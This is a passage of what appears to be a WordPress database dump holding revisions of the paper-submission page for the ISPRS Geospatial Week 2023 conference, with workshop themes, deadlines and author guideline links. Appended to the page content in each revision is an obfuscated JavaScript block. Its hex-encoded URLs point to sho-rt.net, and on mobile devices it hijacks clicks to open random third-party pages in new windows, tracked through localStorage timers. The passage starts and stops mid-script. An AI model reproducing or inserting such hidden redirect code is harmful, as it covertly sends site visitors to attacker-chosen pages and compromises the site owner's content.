)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','publish','closed','closed','','submit','','','2023-05-24 23:30:41','2023-05-24 23:30:41','',0,'https://gsw2023.com/?page_id=2659',0,'page','',0),
(2661,1,'2022-10-09 01:39:00','2022-10-09 01:39:00','','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-10-09 01:39:00','2022-10-09 01:39:00','',2659,'https://gsw2023.com/?p=2661',0,'revision','',0),
(2662,1,'2022-10-09 01:44:39','2022-10-09 01:44:39','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<div class=\"three_quarter first\">\n<ul class=\"nospace\">\n<li style=\"color:red\"style=\"text-align:justify;\">The ISPRS Geospatial Week 2023 will be opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2019/\"target=\"_blank\">ConfTool website of the Geospatial Week</a><br />\n, authors will be able to submit either a full paper or an extended abstract to one of the following workshops/themes:</li>\n</ul>\n<div class=\"gap-10\"></div>\n<ul class=\"nospace\">\n<li>-Unmanned Aerial Vehicles in Geomatics (UAV-g)</li>\n<li>-Laser scanning</li>\n<li>-Digital Transformation</li>\n<li>-Location Based Services (LBS)</li>\n<li>-Smartphones and wearable devices for LBS</li>\n<li>-Sensors for smart and sustainable cities</li>\n<li>-3D Mobile Mapping and GIS Integration</li>\n<li>-Indoor Mobile Mapping</li>\n<li>-LIDAR and SAR Mapping Systems</li>\n<li>-Mobile Mapping Applications</li>\n<li>-Data Fusion of multi-platform Mobile Mapping Technology</li>\n<p style=\"text-align:justify;color:red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\"target=\"_blank\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\"target=\"_blank\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align:justify;color:red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\"target=\"_blank\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\"target=\"_blank\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h1>Paper submissions deadlines</h1>\n<li>-Full paper submission (Annals):     March 2023 (hard deadline, no extension)</li>\n<li>-Abstract submission (Archives):      April 2023 (hard deadline, no extension)</li>\n<li>-Abstract author notification:               May 2023</li>\n<li>-Full paper Author notification:           May 2023</li>\n<li>-Camera ready paper submission:  July 2023</li>\n<div class=\"gap-50\"></div>\n<h2 style=\"color:red;\">Useful links:</h2>\n<li><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\"title=\" \">-Guidelines for Authors</a></li>\n<li><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\"target=\"_blank\" title=\" \">-Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\">\n</div>\n</div>\n<p> [/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-10-09 01:44:39','2022-10-09 01:44:39','',2659,'https://gsw2023.com/?p=2662',0,'revision','',0),
(2663,1,'2022-10-09 01:48:55','2022-10-09 01:48:55','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<div class=\"three_quarter first\">\n<ul class=\"nospace\">\n<li style=\"text-align: justify;\">\n<h5><strong>The ISPRS Geospatial Week 2023 will be opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2019/\" target=\"_blank\" rel=\"noopener\">ConfTool website of the Geospatial Week</a></strong></h5>\n<h5><strong>, authors will be able to submit either a full paper or an extended abstract to one of the following workshops/themes:</strong></h5>\n</li>\n</ul>\n<div class=\"gap-10\"></div>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>-Unmanned Aerial Vehicles in Geomatics (UAV-g)</strong></h6>\n</li>\n<li>\n<h6><strong>-Laser scanning</strong></h6>\n</li>\n<li>\n<h6><strong>-Digital Transformation</strong></h6>\n</li>\n<li>\n<h6><strong>-Location Based Services (LBS)</strong></h6>\n</li>\n<li>\n<h6><strong>-Smartphones and wearable devices for LBS</strong></h6>\n</li>\n<li>\n<h6><strong>-Sensors for smart and sustainable cities</strong></h6>\n</li>\n<li>\n<h6><strong>-3D Mobile Mapping and GIS Integration</strong></h6>\n</li>\n<li>\n<h6><strong>-Indoor Mobile Mapping</strong></h6>\n</li>\n<li>\n<h6><strong>-LIDAR and SAR Mapping Systems</strong></h6>\n</li>\n<li>\n<h6><strong>-Mobile Mapping Applications</strong></h6>\n</li>\n<li>\n<h6><strong>-Data Fusion of multi-platform Mobile Mapping Technology</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>-Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>-Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>-Abstract author notification: May 2023</strong></li>\n<li><strong>-Full paper Author notification: May 2023</strong></li>\n<li><strong>-Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">-Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">-Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 